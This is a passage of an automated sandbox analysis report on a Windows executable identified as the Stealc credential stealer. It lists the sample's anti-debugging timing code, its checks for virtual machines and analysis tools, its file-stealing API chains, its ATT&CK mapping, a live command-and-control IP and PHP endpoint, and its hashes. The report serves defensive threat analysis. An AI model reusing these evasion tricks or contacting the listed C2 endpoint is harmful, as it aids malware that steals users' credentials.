                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10348CD second address: 1034904 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC2C8B99098h 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FC2C8B990A8h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d push ebx 0x0000001e push esi 0x0000001f pop esi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1034904 second address: 1034909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1034909 second address: 1034919 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC2C8B99098h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103726A second address: 1037270 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10374AF second address: 10374BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10374BB second address: 10374C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC2C8DD5EF6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10374C6 second address: 103751E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push ecx 0x0000000b mov dword ptr [ebp+1246BD01h], esi 0x00000011 pop edx 0x00000012 jmp 00007FC2C8B990A3h 0x00000017 push 00000004h 0x00000019 xor dword ptr [ebp+124471A9h], ecx 0x0000001f call 00007FC2C8B99099h 0x00000024 jnl 00007FC2C8B990ACh 0x0000002a pushad 0x0000002b jmp 00007FC2C8B9909Eh 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10391E1 second address: 10391E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103AD92 second address: 103ADBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FC2C8B990A8h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC2C8B9909Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103ADBF second address: 103ADDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8DD5F06h 0x00000007 jp 00007FC2C8DD5EFEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515046B second address: 5150491 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 928Eh 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC2C8B990A7h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5150491 second address: 51504B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8DD5F09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov al, bh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51504B9 second address: 51504E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B9909Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC2C8B990A5h 0x00000012 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DADABB instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DADA0C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F6AC27 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-38942
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00AD40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00ACE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00ACF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00AD47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00AC1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00ACDB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00AD3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00AD4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00ACEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00ACBE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00ACDF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC1160 GetSystemInfo,ExitProcess,0_2_00AC1160
                Source: file.exe, file.exe, 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2164671572.0000000001574000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2164671572.00000000015A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2164671572.000000000152E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37642
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37754
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37769
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37757
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37809
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37775
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC4610 VirtualProtect ?,00000004,00000100,000000000_2_00AC4610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00AD9BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD9AA0 mov eax, dword ptr fs:[00000030h]0_2_00AD9AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00AD7690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5024, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00AD9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_00AD98E0
                Source: file.exe, file.exe, 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B075A8 cpuid 0_2_00B075A8
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00AD7D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD6BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00AD6BC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00AD79E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00AD7BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.ac0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2118707985.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2164671572.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5024, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.ac0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2118707985.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2164671572.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5024, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe42%ReversingLabsWin32.Trojan.Generic
                file.exe39%VirustotalBrowse
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe
                http://185.215.113.206/19%VirustotalBrowse
                http://185.215.113.206/6c4adf523b719729.php17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrueunknown
                http://185.215.113.206/trueunknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptopfile.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://185.215.113.206/-file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://185.215.113.206/:file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/6c4adf523b719729.phpKfile.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000003.2118707985.000000000501B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://185.215.113.206/6c4adf523b719729.php2file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206/6c4adf523b719729.phpRfile.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.206/6c4adf523b719729.php.file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.206/6c4adf523b719729.phpt;file.exe, 00000000.00000002.2164671572.000000000152E000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.206file.exe, 00000000.00000002.2164671572.000000000152E000.00000004.00000020.00020000.00000000.sdmptrue
                                  		unknown
                                  http://185.215.113.2067file.exe, 00000000.00000002.2164671572.000000000152E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    185.215.113.206
                                    		unknownPortugal
                                    		206894WHOLESALECONNECTIONSNLtrue

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1545825
                                    Start date and time:2024-10-31 05:06:05 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 5m 6s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:5
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:file.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 80%
                                    • Number of executed functions: 19
                                    • Number of non-executed functions: 129
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    No simulations

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    185.215.113.206file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, WhiteSnake StealerBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206/746f34465cf17784/vcruntime140.dll
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, WhiteSnake StealerBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                    • 185.215.113.16
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 185.215.113.16
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    No created / dropped files found

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.957392119438948
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:file.exe
                                    File size:2'120'192 bytes
                                    MD5:1bd30bb80448545cc020f946eda1d2f2
                                    SHA1:fdf3333834e0a0d4f2d1ed90c8179a2f76d6d512
                                    SHA256:0eab0f6617a84d6ffdc802b19a9502e7910aace80478d15360685830c84e324e
                                    SHA512:5d694263b5b216b73c26e5fb58a645a160d045bb32f8faf88f0ad4dcf49248bece88e7fe836ed136a7e27c1b3b0e4e86336a37c259f9a24e6636ae269dff8b9b
                                    SSDEEP:49152:mVbwALc7MiUz6WuB0Js1dJHbLf1CGIdxtsOx2vKUX:usALBiUz6Wk0JsDJHnfYlvtrOZ
                                    TLSH:63A533072D1763BDC4EE42B1A1CDF3AA10F1B8216D90DE9225493B354D5B374AA32ED7
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

                                    File Icon

                                    Icon Hash:00928e8e8686b000

                                    Static PE Info

                                    General

                                    Entrypoint:0xb20000
                                    Entrypoint Section:.taggant
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                                    Entrypoint Preview

                                    Instruction
                                    jmp 00007FC2C84FB94Ah

                                    Rich Headers

                                    Programming Language:
                                    • [C++] VS2010 build 30319
                                    • [ASM] VS2010 build 30319
                                    • [ C ] VS2010 build 30319
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [LNK] VS2010 build 30319

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
